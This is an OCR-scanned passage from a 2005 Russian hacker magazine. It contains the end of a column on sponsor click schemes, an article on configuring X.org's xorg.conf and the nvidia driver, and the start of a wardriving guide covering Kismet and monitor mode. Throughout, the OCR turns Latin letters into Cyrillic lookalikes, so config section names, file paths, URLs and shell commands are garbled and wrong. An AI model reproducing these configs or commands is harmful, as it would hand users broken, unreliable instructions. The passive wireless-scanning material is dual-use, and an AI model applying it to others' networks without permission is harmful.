призналась, что никакие каталоги не выпускает, не знает, почему их об 
этом просят, и хотела бы знать, что вообще происходит. 

Не прошли мимо меня и спонсоры, которые описаны чуть выше. Этим 
переболели многие ранние рунетчики, особенно из тех кому от 12 до 
20. Конечно, хотелось легких денег, чтобы покрыть расходы инета, 
сладкой халявы, и нам это так явно предлагали. Но даже те, кто полу- 
чил какие-то чеки, потом поняли, что те центы не стоят всех часов, про- 
веденных за тупым кликаньем. На щелканьи баннеров и просмотре 
спама ты не построишь себе карьеру, а на гроши, заработанные таким 
образом, не купишь даже Жигули. Сейчас Интернет предоставляет ку- 
чу возможностей реально зарабатывать. Журналистам, художникам, 
дизайнерам... людям любых творческих профессий. И это намного 
интереснее и прибыльнее, чем впаривать бесполезные книги, или це- 
лыми днями глазеть на рекламный бред. Адьес, Амиго © 
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ЮНИТЫ КРЕАТИФФ КОДИНГ [ІШІХОЮ] СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 






Неведомый 
мир иксов 



Все о настройке 
Х-ѴѴіпсІоѵѵ 

СИСТЕМА Х-ѴѴІШОѴѴ ЯВЛЯЕТСЯ ОСНОВОЙ 
БОЛЬШИНСТВА РАБОЧИХ СТОЛОВ *І\ІІХ-СИС- 
ТЕМ. ОТ ЕЕ ПРАВИЛЬНОЙ НАСТРОЙКИ ЗАВИ- 
СИТ МНОГОЕ: ОТ РАЗРЕШЕНИЯ ЭКРАНА И ГЛУ- 
БИНЫ ЦВЕТА ДО ВОЗМОЖНОСТИ ЗАПУСКА 
ОРЕЫОЬИГР. ИМЕННО ПОЭТОМУ НЕОБХОДИ- 
МО ХОРОШО РАЗБИРАТЬСЯ В ГЛАВНОМ КОН- 
ФИГУРАЦИОННОМ ФАЙЛЕ ИКСОВ I рт (І1т@1і5і.ги)> 



ѵіѵіѵі.х.огд 
и/и/и /.хігеевб.огд 
ѵѵшѵѵ.пѵігііа.сот 
и/и/и /.аіі.сот 

шѵѵ.ІіпихІіагсІтге.огд/пѵсІоск/ 

И Начиная с четвертой версии, ХРгеевб стал по-настоящему модуль- 
ным. Теперь все драйвера и расширения разложены по отдельным мо- 
дулям и каталогам. 

Е В настоящее время появилось сразу несколько проектов, позволяю- 
щих приспособить иксы к современным реалиям. Например, проекты 
ХдІ и ХЭігесІРВ вводят композитную модель окон (это автоматически 
придает окнам свойство прозрачности) и позволяют использовать воз- 
можности современных видеокарт для ускорения отрисовки. 

[преамбула] Мы живем в период лицензионных споров. ХРгеевб, не- 
когда бывший неотъемлемой частью любого дистрибутива І_іпих, поте- 
рял свои позиции. На смену ему пришел Х.огд, распространяемый по бо- 
лее либеральной лицензии. 

С точки зрения конечного пользователя, различия между этими двумя оконны- 
ми системами минимальны. Переименованы некоторые команды и тап-стра- 
ницы. Вместо привычного /еіс/Х1 1/ХГ86Сопіід появился /еіс/Х11/хогд.соп{, по 
внутреннему содержанию практически не отличимый от своего предшествен- 
ника. В статье я буду акцентировать внимание именно на Х.огд, делая по ходу 
текста некоторые поправки в отношении ХІгеевб. 




[несколько фактов о Х-ѴѴіпгіоѵѵ] 

Ш Оконная система Х-ѴѴіпсІоѵѵ была разработана 
в 1984 году (тогда она еще носила имя АІГіепа) и 
позиционировалась как универсальная графичес- 
кая среда пользователя. 

Е Иксы построены на клиент-серверной архитек- 
туре. Что позволяет осуществлять прозрачную 
работу через сеть, но создает существенный 
оверхед на локальной машине (отключить прос- 
лушивание бОООЛср можно с помощью команды 
"зіагіх - -поіізіеп Іср"). 

Е Все возможности Х-ѴѴіпсІоѵѵ по работе с окнами 
сводятся к их отрисовке по определенным коор- 
динатам и правильному наложению друг на дру- 
га. Всю работу по созданию рамок, заголовков и 
перемещению окон должен выполнять «менед- 
жер окон» (ІІихЬох, ѴѴіпбоѵѵМакег, Іѵѵѵт2 и т.д.). 



16 БИТ 

И ПРОИЗВОДИТЕЛЬНОСТЬ 

Утверждения о том, что 
установка глубины цвета в 
1 6 бит повысит скорость 
отрисовки изображения, не 
всегда верны. Современные 
карточки от пѴісІіа и АТІ 
оптимизированы на работу с 
24-х битным цветом. 



ТАЙНА ЗАГАДОЧНОГО «X» 

Х-ѴѴіпсІоѵѵ получила свое наз- 
вание благодаря банальному 
отсутствию фантазии у ее 
авторов, которые до этого 
разрабатывали оконную сис- 
тему ѴѴ (от слова ѴѴіпбоѵѵ). 
АХ — это всего лишь следу- 
ющая, после ѴѴ, буква анг- 
лийского алфавита :). 



ОСТОРОЖНЕЕ С ПОЛЕМ ЮЕІЧТІРІЕВ 

Каждый раз, когда ты прописываешь новое значение 
в поле Ісіепййег какой-либо из секций, не забудь вносить изме- 
нения в секцию ЗегѵегІ_ауоиГ 
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создание конфига, используя хогдсопіід 
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[создаем шаблон] Создать дефолтный конфиг, точнее шаблон для даль- 
нейшего потрошения, можно двумя способами: командой /изг/ХИ/Ып 
/хогдсопіід \лп\л/изг/Х1 1/Ып/хогдсід (хШбсопІід и хШбсІд для ХРгеебб). Пер- 
вая утилита является интерактивной. Запустив ее и ответив на несколь- 
ко простых вопросов, ты найдешь в своем домашнем каталоге вполне 
работоспособный конфиг, который, впрочем, далек от идеала. Команда 
хогдсід более продвинута. Она работает в графическом режиме и поз- 
воляет настраивать иксы через различные меню. Лично я считаю 
хогдсопіід гораздо более удобным средством начального конфигуриро- 
вания, к тому же не-РЗ/2 мыши очень часто отказываются работать в 
хогдсід, что сильно затрудняет конфигурирование (приходится исполь- 
зовать клавиатуру для перемещения курсора). 

[итак, приступим] После того как конфиг был создан, скопируй его в 
каталог /еіс/Х11 и запусти любимый редактор. Конфиг иксов имеет 
очень продуманную структуру (я бы даже сказал — это пример, каким 
должен быть конфигурационный файл). Он разделен на несколько сек- 
ций, каждая из которых позволяет настроить определенный компонент 
иксов. Всего существует восемь основных секций: Мобиіе, Рііез, 
ЗегѵегРІадз, ІприЮеѵісе, Мопііог, Оеѵісе, Зсгееп и ЗегѵегІ_ауоиІ. Причем 
последние пять могут существовать в нескольких экземплярах. 

[путеводитель по файлам] Начнем с секции Рііез, позволяющей ука- 
зать Х-серверу пути к файлам, необходимым для его правильной работы. 
Например, при помощи записи РопІРаІИ можно указать путь поиска 
шрифтов или идентификатор сервера шрифтов (смотри хіз(і)) в таком 
формате: протокол/хост:порт (для локальной машины подойдет такая за- 
пись: ипіх/ІосаІНоз1:7100). Запись РКЗВРаІИ задает путь к базе цветов, ко- 
торую, впрочем, можно и не указывать. Используя запись МобиІеРаІП, 
определяется альтернативное расположение модулей (драйвера тоже 
являются модулями). Приведу пример из моего конфига (обрати внима- 
ние, что очередность указания путей влияет на их приоритет, поэтому 
путь к русским шрифтам следует прописывать в первую очередь): 

[пример секции Рііез] 

Зесііоп "Рііез" 

РопІРаШ Ѵизг/зІіаге/ІопІзДгиеІуре" 

РопІРаШ Уизг/Х1 1 Рб/ІіЬ/ХІ 1/Іотз/сугіІІіс/" 

РопІРаШ "/изг/Х1 1 Рб/ІіЬ/ХІ 1/ІопІз/тізс/" 

РдЬРаІЬ Ѵизг/Х1 1 Рб/ІіЬ/ХІ 1/гдЬ" 

МосіиІеРаШ "/изг/Х1 1 Рб/МЬ/тосІиІез" 

ЕпсіЗесІіоп 

[расширяем возможности иксов] Теперь у нас на очереди необя- 
зательная секция Мобиіе. Она используется для контроля над тем, какие 
модули должен загружать Х-сервер при старте. Модули находятся в ка- 
талогах /изг/ХІ 1Н6/ІіЬ/тосІиІез/{ехіепзіопз^опіз}. Вот краткое описание 
каждого из них: 

Ш ехітоб — множество различных расширений для Х-сервера, собран- 
ных в одном модуле. Рекомендую включить, так как используется мно- 
гими программами, особенно менеджерами окон. 

Ш сігі (ОігесІ Вепбегіпд Іпігазігисіиге) обеспечивает прямой доступ к видеокар- 
те и функциям ОрепѲІ_. Соответственно, загружать его следует в том слу- 
чае, если необходимо аппаратное ускорение. Важное замечание: официаль- 
ные драйвера от пѴібіа используют свой способ доступа к видеокарте (через 
модуль ядра) и не нуждаются в этом расширении. С другой стороны, драй- 
вера от АТІ полностью поддерживают архитектуру ОВІ. 

Е діх — обеспечивает поддержку Ореп(ЗІ_. Нужно или нет — решай сам. 
И бЬе (ОоиЫе ВиІІег Ехіепзіоп) — модуль обеспечивает двойную буфе- 
ризацию. Используется многими ОрепОЬпрограммами. 

Е Ьіітар — поддержка обычных растровых шрифтов Х-ѴѴіпбоѵѵ, указы- 
вать не надо, грузится автоматически. 

И (гееіуре — поддержка замечательных ТТР-шрифтов (именно они ис- 
пользуются в ѴѴіпбоѵѵз и МасОВ), их нет в поставке Х-сервера, но мож- 
но взять из названных операционок. 

И Іуреі — векторные шрифты от АбоЬе. Уступают ТТР-шрифтам, но их 
можно найти в дистрибутиве (пакет дпи-дз-іопіз). 

Загрузка модулей осуществляется с использованием опции І_оаб. При- 
чем для ехітоб доступна также и следующая форма, которая позволяет 
использовать модуль без указанного расширения: 

ЗиЬЗесІіоп "ехітосі" 

Орііоп "отіі расширение" 

ЕпсіЗиЬЗесІіоп 



[ХАКЕР 12 [84] 05 > ШЧІХОЮ 99 ] 







[ХАКЕР 12 [84] 05 > ІІІЧІХОЮ 100 ] 



Пример секции "Мосіиіе" 

Зесііоп "Мосіиіе" 

ЗиЬЗесІіоп "ехітосі" 

Орііоп "отіі хТгее86-с!да" 

ЕпсіЗиЬЗесІіоп 
І_оасі "діх" 

І_оасі "сіЬе" 

І_оасі "Ігееіуре" 

ЕпсІЗесІіоп 

[управляем поведением иксов] Поведением и реакцией Х-сервера 
на различные события можно управлять. Делается это путем указания 
необходимых опций в секции ЗегѵегРІадз. Самих опций достаточно мно- 
го, объясню назначение самых важных и полезных: 

Ш ОопіѴТЗѵѵйсЬ — позволяет отключить возможность временного выхода 
из иксов в консоль с помощью комби- 
нации «СігІ+АІІ+РХ». Полезно вклю- 
чить, если по каким-либо причинам 
это действие приводит к зависанию 
сервера. Например, в случае исполь- 
зования кривых драйверов Ііпих-Ігате- 
ЬиЛег. Значение по умолчанию: Іаізе. 

Е Ооп12ар — отключает комбина- 
цию клавиш «СШ+АН+Васкзрасе», 
немедленно убивающей Х-сервер. 

Значение по умолчанию: Іаізе. 

Е РопСоот — отключает реакцию 
Х-сервера на комбинации 
« СігІ + АІі+ Кеу раб -Р I из » 
и «СігІ+АІІ+Кеураб-Міпиз», 
позволяющие изменять видеоре- 
жим. Значение по умолчанию: Іаізе. 

И ОізаЫеѴібМобеЕхІепзіоп — вклю- 
чение этой опции приводит к невоз- 
можности использования утилиты 
подстройки видеорежима /изг/ХІІ/ 

Ьіп/хѵісііипе. Полезно включить, что- 
бы кто-нибудь в твое отсутствие не 
попытался сжечь монитор. Значение 
по умолчанию: Іаізе. 

Е АІІоѵѵМоизеОрепРаіІ — по дефолту 
иксы не запускаются, если мышь не 
была найдена. Такое поведение мож- 
но отключить с помощью этой опции. Значение по умолчанию: Іаізе. 

Е ВІапкТіте — таймаут перед запуском скинсейвера. Значение 
по умолчанию: 10. 

И ЗІапбЬуТіте, ЗизрепбТіте, ОІГГіте — данные опции задают таймау- 
ты для различных стадий энергосбережения монитора: зІапсІЬу, зизрепб 
и оЛ. Монитор должен поддерживать ОРМЗ (Оізріау Роѵѵег Мападетепі 
Зузіет). Значения по умолчанию: «20», «30», «40». 

Е Хіпегата — включает одноименное расширение, необходимое для од- 
новременной работы с двумя мониторами. Значение по умолчанию: Іаізе. 
Все опции задаются в следующем формате: Орііоп «Опция» «значение». 

[вводная часть] Начиная с ХРгеевб четвертой версии, для настройки 
клавиатуры и мыши стали использоваться секции с одним и тем же име- 
нем: ІприЮеѵісе. Чтобы парсер конфига мог их отличать, требуется ука- 
зать имя используемого драйвера такой строкой: Огіѵег "кЬсГ (Огіѵег 
КеуЬоагб в случае с ХРгеевб) для клавиатуры или Огіѵег гтіоизе, соотве- 
тственно, для мыши. Помимо этого, должны быть указаны идентифика- 
тор (строка: "ІбепШіег идентификатор2), представленный любой строкой, 
и опции (Строка: Орііоп "Опция" "значение"). 

Начнем с клавиатуры. Самые полезные опции здесь: 

Ш ХкЬПиІез — задает правила интерпретации опций: ХкЬМобеІ, 
ХкЫауоиІ, ХкЬѴагіапІ и ХкЬОрйопз. По умолчанию установлено "хігеевб" 
и нет смысла задавать другое значение. 

Е ХкЬМобеІ — модель клавиатуры. Сейчас можно встретить три моде- 
ли: рсЮІ (по умолчанию), рс104 и рс105. Число здесь указывает на ко- 
личество клавиш. 

Е ХкЫ_ауоиІ — расположение клавиш на клавиатуре (раскладка). 

Для англо-русских клавиатур следует указывать из,ш. 

И ХкЬѴагіапІ — опция используется для тюнинга настроек вышеописан- 
ной опции. Например, чтобы заставить работать клавиши «ѴѴіпсІоѵѵз» 
и «Меню» (на ѴѴіпбоѵѵз-совместимых клавиатурах), следует указать 
«,ѵѵіпкеуз» (запятая обязательна). 

И ХкЬОрІіопз — позволяет указать некоторые дополнительные опции. Обычно 



используется для настройки клавиш переключения раскладки. Для этого нужно 
прописать «дгр:идентификатор», где «идентификатор» задает комбинацию кла- 
виш. Самые популярные комбинации: ѵѵіп_зѵѵіісП (клавиша ѴѴіпсІоѵѵз), 
сІгІ_зЫІМоддІе (СІгІ+ЗЬіЛ), сарз_ІоддІе (СарзІ_оск), аК_зНіІМоддІе (АІі+ЗІпіТІ) и 
плепи_к)ддІе (клавиша «Меню»). Также после запятой советую прописать 
дгр_ІесІ:зсгоІІ, чтобы при включении русской раскладки загорался огонек ЗсгоІІ. 
Е АиІоПереаІ — скорость повторения нажатой клавиши. Задается в та- 
ком формате «задержка скорости», где «задержка» — это таймаут пе- 
ред началом повторения в миллисекундах, а «скорость» — частота пов- 
торения (раз в секунду). Дефолтное значение: «500 30». 

Теперь о грызуне. В простейшем случае опции вообще не нужно указывать. 
Главное, чтобы существовал симлинк /деѵ/тоизе, указывающий на порт, к 
которому подключена мышь, а необходимый режим работы Х-сервер сам 
подберет. Но все-таки в некоторых случаях эта схема может оказаться не- 
действенной. Тогда для настройки мыши можно воспользоваться приве- 
денной шпаргалкой. Вот какие опции предусмотрели создатели иксов: 

ЕЛ РгоІосоІ — задает протокол, по ко- 
торому Х-сервер будет общаться с 
мышью. Самые распространенные 
протоколы: МісгозоЛ и МоизеЗузІетз 
(СОМ-мыши), РЗ/2 и ІІЗВ. Но, как я 
уже говорил, можно указать и Аиіо для 
автоматического выбора. 

Е Оеѵісе — используемый порт. 
Обычно /беѵ/ПуЗХ для древних СОМ- 
мышей и /деѵ/рзаих для РЗ/2 (и не за- 
бываем про симлинк /деѵ/тоизе). 

В ВиПопз — количество клавиш на 
мышке. Мыши с колесиком обычно 
оснащены пятью клавишами (две 
обычные клавиши и три эмулируются 
колесом). По умолчанию: 3. 

И ЕтиІаіеЗВиНопз — эмуляция 
третьей клавиши через двойное на- 
жатие первой и второй. Полезно 
включить для двухкнопочной мыши 
(хотя где сейчас такую взять?). По 
умолчанию: Іаізе. 

Е 2АхізМарріпд — опция позволяет 
указать, какие клавиши использо- 
вать в качестве колесика. Для обыч- 
ной мыши с колесиком значение 
должно быть: «4 5». 



# клавиатура с англо-русской раскладкой и переключением по клавише «Меню» 
Зесііоп "ІприЮеѵісе" 

ШепШіег "КеуЬоагсЮ" 

Огіѵег "кЬсГ 

Орііоп "ХкЬВиІез" "хТгее86" 

Орііоп "ХкЬМосіеІ" "рсі 05" 

Орііоп "ХкЫауоиі" "из,ги" 

Орііоп "ХкЬѴагіапІ" ",\л/іпкеуз" 

Орііоп "ХкЬОрІіопз" "дгр:тепи_1одд1е,дгр_1ес1:5СгоИ" 

ЕпЬЗесІіоп 

# мышь, контролируемая демоном дрш (сам демон следует запус- 
кать с флагом '-В') 

Зесііоп "ІприЮеѵісе" 

ШепШіег "Орт Моизе" 

Огіѵег "тоизе" 

Орііоп "Ргоіосоі" "МоизеЗузІетз" 

Орііоп "Оеѵісе" "/Ьеѵ/дргткМа" 

Орііоп "Вийопз" "3" 

Орііоп 7АхізМарріпд" "4 5" 

ЕпЬЗесІіоп 

# ІІЗВ-мышь 
Зесііоп "ІприЮеѵісе" 

ШепШіег "ІІЗВ Моизе" 

Огіѵег "тоизе" 

Орііоп "Ргоіосоі" "ІІЗВ" 

Орііоп "Оеѵісе" "/Ьеѵ/тоизе" 

Орііоп "ВиНопз" "5" 

Орііоп 7АхізМарріпд" "4 5" 

ЕпЬЗесІіоп 




тап хогд.сопі 



[пример секций ІприЮеѵісе] 





[монитор] Теперь займемся конфигурированием монитора. Этот про- 
цесс очень простой, достаточно найти документацию к монитору и про- 
писать в секции Мопііог допустимые частоты горизонтальной синхрони- 
зации и обновления экрана. Например, открываем чтиво к монитору 
ЗупсМазІег 757тЬ и видим, что диапазон частот для данного монитора 
составляет 30 — 96 (частота синхронизации) и 50 — 160 (частота обновле- 
ния экрана). Основываясь на этих данных, пишем две строки: НогігЗупс 
30 — 96 и ѴегІВеІгезІі 50 — 160. Также присутствует возможность подкор- 
ректировать гамму, используя такую запись: Оатта "геб-датта дгееп- 
датта Ыие-датта". Значения могут быть в диапазоне от 0.1 до 1 0.0. По 
умолчанию: «1.0 1.0 1.0». Полезно в тех случаях, когда хочется поднять 
яркость картинки. То же самое можно сделать, используя утилиту 
/изг/ХІ 1/Ып/хдатта. Настоятельно рекомендую активировать поддерж- 
ку ЭРМЗ, записав в конфиг строку: Орііоп 'ЮРМЗ" "Ігие". Теперь Х-сер- 
вер будет знать, как правильно 
«усыпить» монитор. 

Разработчики утверждают, что 
четвертая версия ХРггевб умеет 
правильно выставлять видеоре- 
жим и не требует ручного вме- 
шательства. К сожалению, это 
не всегда верно. В некоторых 
случаях частота обновления эк- 
рана автоматически выставляет- 
ся в 75 Гц. Поэтому рекомендую 
прописать Мобеипе самому. 

Чтобы получить для видеорежи- 
ма 1024x768 100 Гц необходи- 
мые значения, воспользуемся 
утилитой /изг/ХІ 1/Ып/дН: 

$ д« 1024 768 100 

# 1024x768 @ 100.00 Нг (6ТР) іізупс: 81.40 кНі; рсік: 113.31 МНг 
МосІеІіпе "1024х768_1 00.00" 113.31 1024 1096 1208 1392 768 769 772 
814 -НЗупс +Ѵзупс 

Теперь записываем вывод команды в секцию Мопііог — и готово. После 
этого для видеорежима 1024х768_1 00.00 всегда будет выставляться 
частота обновления в 100 Гц. 

[пример секции "Мопііог"] 

Зесііоп "Мопііог" 

ІсІепІіТіег "топііог" 

# Затзипд ЗупсМазІег 757тЬ 

НогііЗупс 30-96 

ѴегШеІгезіі 50-160 

Орііоп "ЭРІѴІЗ" "ігие" 

#800x600 @ 100.00 Н 2 

МосІеІіпе "800x600" 68.18 800 848 936 1072 600 601 604 636 -НЗупс 
+Ѵзупс 

# 1024x768 @ 100.00 Н 2 

МосІеІіпе "1024x768" 113.31 1024 1096 1208 1392 768 769 772 814 - 
НЗупс +Ѵзупс 
ЕпсІЗесІіоп 



Виз 2, сіеѵісе 0, Іипсііоп 0 

Ѵ6А сотраІіЫе сопігоііег: пѴШіа Согрогаііоп NN/11 [6еРогсе2 МХ/МХ 
400] (геѵ 178). 

Следовательно, мне необходимо прописать в секции Оеѵісе строку: 
ВизЮ "РСІ:2:0:0". 

В последнее время крупнейшие производители видеокарт (АТІ и пѴісІіа) 
занялись выпуском драйверов для І_іпих и РгееВЗО. Во многом родные 
драйвера превосходят те, что поставляются с Х-сервером. Поэтому нас- 
тоятельно рекомендую владельцам видеокарт от этих производителей 
сходить на официальные сайты (ѵѵѵѵѵѵ. пѵісІіа. сот и ѵѵѵѵѵѵ.аіі.сот) и ска- 
чать последние версии драйверов. 

Рассмотрим процесс установки пѵісііа-драйверов. Они распростра- 
няются в самораспаковывающемся архиве, который имеет расшире- 
ние ".гип". Так как часть драйве- 
ра является модулем ядра, то 
необходимо заранее позабо- 
титься о том, чтобы в каталоге 
/изг/згс/Ііпих (/ изг/згс/зуз для 
РгееВЗО) находились исходники 
ядра. Теперь выйди из иксов и 
от имени суперпользователя за- 
пусти предварительно скачан- 
ный файл с драйверами. Перед 
тобой появится окошко, выпол- 
ненное в удобном псигзез-ин- 
терфейсе. Далее тебе предло- 
жат согласиться с лицензией и 
зададут еще несколько вопро- 
сов. Когда появится вопрос о 
том, хочешь ли ты скачать пре- 
компилированный модуль ядра с сайта пѵісІіа, отвечай «нет», пусть 
сам собирает из исходников. 

После благополучного окончания установки открой конфиг иксов и убери 
из секции Мобиіе строки: І_оасІ "сігі" и І_оасІ "(ЗІ_соге", но оставь строку: І_оасІ 
"діх". Далее в секции Оеѵісе пропиши: бгіѵег "пѵісІіа" и удали/закомменти- 
руй предшествующую запись. Теперь можешь запускать иксы и оценить 
производительность 30 при помощи теста /изг/ХІ ІНб/Ьіп/дІхдеагз. 
Драйвер от пѴісІіа привносит с собой множество полезных (и не очень) 
опций. Рассмотрим две из них (со всеми можно ознакомиться, заглянув 
в секцию О файла /изг/с!ос/МѴЮІА_ОіХ-1 .0/НЕАОМЕ)-. 

Ш І\ІоІ_одо — позволяет отключить заставку пѴісІіа, демонстрируемую во 
время запуска иксов. Значение по умолчанию: Іаізе. 

Ц] ВепбегАссеІ — включает аппаратное ускорение расширения Х-серве- 
ра ВЕІ\ЮЕВ, используемого в основном для сглаживания шрифтов. Зна- 
чение по умолчанию: Іаізе. 

[пример секции Эеѵісе] 

Зесііоп "Оеѵісе" 

ІсІепШіег "6еРогсе2" 

Огіѵег "пѵісІіа" 

Орііоп "МоІ_одо" "Іше" 

Орііоп "ВепсІегАссеІ" "Ігие" 

ЕпсІЗесІіоп 




используем діі для генерации МосІеЫпе 



[сердце видеоподсистемы] В большинстве 
случаев видеодрайвера настраивать не нужно, 
достаточно прописать идентификатор видеокарты 
(например: ІбепШіег "ѲеРогсе2") и необходимый 
драйвер (например: Эгіѵег "пѵісІіа") в секции Оеѵісе. 

Причем имена драйверов соответствуют именам 
модулей, что лежат в каталоге /изг/ХІ 1/ІіЬ/тосІиІез/ 
сігіѵегз, а их описание можно взять из четвертого 
раздела тап-страниц. 

Рассмотрение каких-либо опций здесь будет лиш- 
ним, потому как Х-сервер достаточно умен, чтобы 
опросить видяху и выставить всем опциям нужные 
значения. Отмечу лишь одну полезную директиву: 

ВизЮ (формат «РСІ:Ьиз:сІеѵісе:Іипсйоп»). С ее по- 
мощью можно указать месторасположение видео- 
карты на РСІ-шине. Х-сервер способен и сам найти видеокарту, 
но если их установлено две, то для каждой придется прописать свой 
ВизЮ. Найти видеокарту можно воспользовавшись утилитой /изг/Ьіп/Ізрсі, 
или выполнив команду саі /ргос/рсі. Например, после выполнения приве- 
денной команды я увидел такую запись: 



В поставку с драйвером входит утилита 
пѵісііа-зеиіпдз. С ее помощью можно не 
только получить множество сведений о 
видеокарте и поддержке ОрепОЦ но и из- 
менить такие параметры драйвера, как яр- 
кость, контраст, гамма, сглаживание. 
Нельзя не упомянуть об инструменте 
пѵсіоск, который предоставляет возмож- 
ность изменять частоты графического 
чипа и видеопамяти, что более чем акту- 
ально, так как на многих видеокартах 
они искусственно занижены. Сама утили- 
та имеет аж три интерфейса командной 
строки и два графических (для ѲТК+2 и 
ОТ). Причем интерфейс командной стро- 
ки наиболее привлекателен, так как позволяет прописать необхо- 
димую команду в загрузочные скрипты. Например, ты можешь 
записать в /еіс/гс.д/гс.іосаі команду: "пѵсіоск -п 250 -т 200", и при 
каждой загрузке будут устанавливаться частоты: чип — 250 МГц 
и память — 200 МГц © 
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ЮНИТЫ КРЕАТИФФ КОДИНГ [ІЖІХОШ] СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕРРІІМ НЬЮСЫ 



г ' / 





Воздушные асы XXI века 

Арсенал вардрайвера-юниксоида 



БЕСПРОВОДНЫЕ ТЕХНОЛОГИИ УЖЕ 
ДАВНО ПЕРЕСТАЛИ БЫТЬ ЭКЗОТИ- 
КОЙ, УДЕЛОМ ИЗБРАННЫХ. ЛЮБОЙ 
СОВРЕМЕННЫЙ НОУТБУК КОМПЛЕК- 
ТУЕТСЯ ѴѴІ-РІ КАРТОЙ, А ЗА $50 
МОЖНО БЕЗ ПРОБЛЕМ ПРИОБРЕС- 
ТИ ТОЧКУ ДОСТУПА. БЕСПРОВОД- 



НЫЕ СЕТИ ОКУТЫВАЮТ ОДИН ГО- 
РОД ЗА ДРУГИМ, А ПОТОМУ ВСЕ 
БОЛЬШУЮ ПОПУЛЯРНОСТЬ НАБИ- 
РАЕТ ТАКОЕ ЦИФРОВОЕ РАЗВЛЕЧЕ- 
НИЕ, КАК ВАРДРАЙВИНГ. У ТЕБЯ 
ЕСТЬ НОУТБУК, И ТЫ ПОЛОН ЖЕЛА- 
НИЯ СТАТЬ КОРОЛЕМ ВОЗДУХА? ОТ- 



ЛИЧНО, НО ГОТОВА ЛИ ТВОЯ СИС- 
ТЕМА К ТОМУ, ЧТОБЫ СТАТЬ ПОЛ- 
НОЦЕННЫМ, МНОГОФУНКЦИОНАЛЬ- 
НЫМ ИНСТРУМЕНТОМ В РУКАХ 
ОПЫТНОГО ВАРДРАЙВЕРА? ЕСЛИ 
НЕТ — НЕ БЕДА, ВОТ ТЕБЕ НАШЕ РУ- 
КОВОДСТВО I Апіоп Кагроѵ (Іоха @ геаі. хакер. ш) 






[беспроводные карты всех мастей] Если ты обладатель ноутбу- 
ка с технологией Іпіеі Сепігіпо, то поспеши обновить свою систему до ак- 
туальной версии (РгееВЗО — до 6.0 или СІІППЕЫТ, ОрепВЗО — до 3.8, 
І_іпих — до последнего стабильного 2.6 ядра). Дело в том, что эти систе- 
мы начали полноценно поддерживать, построенные на центриновском 
чипсете, карты (Іпіеі РВО/ѴѴігеІезз 2100 и 2200ВО/2225ВО/2915АВО) 
сравнительно недавно. Что понимается под «полноценной» поддерж- 
кой? Здесь имеется в виду использование карты в режиме Мопііог тобе. 
Как известно, беспроводная карта обязана уметь работать, как мини- 
мум, в двух режимах: ВЗЗ (Вазіс Зегѵісе Зеі) ака Іпігазігисіиге, когда 
клиент подключен к сети с использованием точки доступа (как правило, 
беспроводные сети строятся именно по такому принципу), и ІВЗЗ 
(Іпберепсіепі Вазіс Зегѵісе Зеі) ака аб-Пос, когда клиент подключен без 
использования точки доступа (связь «точка-точка», например, когда не- 
обходимо связать по сети два компьютера, чтобы обменяться файлами). 
Проблема для вардрайвера состоит в том, что ни один из этих режимов 
не подходит для ловли пакетов и обнаружения точек доступа. Ведь оче- 
видно, что в обоих случаях карта так или иначе должна быть ассоцииро- 
вана с сетью, и ее перевод в рготізс тобе не даст много бонусов. Кар- 
та действительно будет ловить все пакеты, но только адресованные 
всем клиентам какой-либо конкретной сети (на которую она настроена). 
Для того чтобы ловить все 802.1 1 -фреймы, но при этом не быть ассоци- 
ированным ни с одной сетью, существует режим монитора (Мопйог тобе). 
Поддержка драйвером карты этого режима в Ыпих/ВЗО во многом опре- 
деляется открытостью спецификаций на карту. Полнофункциональные 
драйвера существуют для карт на чипсете Ргізт-{11, 2.5,3}, Огіпосо, АЙпегоз, 
Ваііпк, АігопеГ ІпІеГовские карточки получили полную поддержку не так 
давно («родной» драйвер для ВЗО-систем «научился» этому только 22 
мая этого года). К тому же лицензия не позволяет свободно распростра- 
нять загружаемую прошивку (Іігтѵѵаге), необходимую для работы этих 
карт, так что пользователям ВЗО-систем придется найти ее самим, как и 



утилиту ірѵѵсопІгоІ(8) (в случае РгееВЗО), чтобы загрузить прошивку. 
Вторая по степени важности, после драйвера, возможность карты — 
подключение внешней антенны. Наверное, ни для кого не является сек- 
ретом, что, используя внешнюю антенну с коэффициентом усиления 8 — 
10 бВі (такие антенны можно легко купить за $30 — 50), можно обнару- 
жить сети в гораздо большем радиусе, чем если бы использовалась 
штатная встроенная антеннка. Некоторые карты имеют на борту ма- 
ленький разъем, именуемый І_исепі МС, или просто МС. Сами антенны 
«домашнего» формата (хотя, конечно, можно купить и промышленную 
оиібоог-антенну и водрузить ее на крышу автомобиля) чаще всего комп- 
лектуются разъемом ВР-ЗМА, так что, помимо карты и антенны, необхо- 
дим переходник рідіаіі, который можно найти на радиорынке. 

[кізтеі — как много в этом звуке!] Главный инструмент вардрайве- 
ра — сканер-детектор беспроводных сетей. А главный сканер для ІІпіх-Ііке 
систем — это, безусловно, Кізтеі {шш.кізтеішеіезз.пеі). Он построен с 
использованием клиент-серверной архитектуры (сервер запускается на од- 
ной машине, клиенты с графическим интерфейсом запускаются с удален- 
ных машин и соединяются с сервером, обрабатывая полученную от него ин- 
формацию) и обладает исключительной функциональностью. Кізтеі может 
быть интегрирован и с другим софтом, таким как ЮЗ Зпогі или ОРЗ-нави- 
гатор. Помимо всего прочего, он поддерживает большое количество карт. 

Перейдем непосредственно к установке (в случае РгееВЗО): 

$ ссі /изг/рогіз/пеі-тдгпі/кізтеі 
# таке іпзіаіі сіеап 

Теперь перед тем как углубиться в настройки КізтеГа, уделим внимание 
принципам работы сканера. Кізтеі переводит карту в режиме Мопііог и 
начинает «прыгать» по каналам (сіпаппеі Иорріпд) в поисках беспровод- 
ного трафика. Поймав сигнал, сканер ловит и обрабатывает беспровод- 
ные фреймы (аутентификационные, информационные), 
на основе чего делает вывод о типе сети, поддержке 
шифрования, ЗЗЮ, производителе точки доступа и т.д. 
Адресация и наличие клиентов в сети определяется пе- 
рехватом другого типа фреймов — фреймов данных. Та- 
ким образом, Кізтеі работает в полностью пассивном ре- 
жиме, и потому не дает себя обнаружить. 





кізтеі умеет строить нагрядные графики 



вардрайверы во всеоружии 
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Можно с гордостью сказать, что Кізтеі способен находить даже «скры- 
тые» сети. Под «скрытой» сетью понимается точка доступа с отключен- 
ной функцией Вгоасісазі 83Ю. По умолчанию АР рассылает управляю- 
щие фреймы (Ьеасопз), в которых содержится информация, в том числе 
и об идентификаторе сети. В качестве меры безопасности многие вен- 
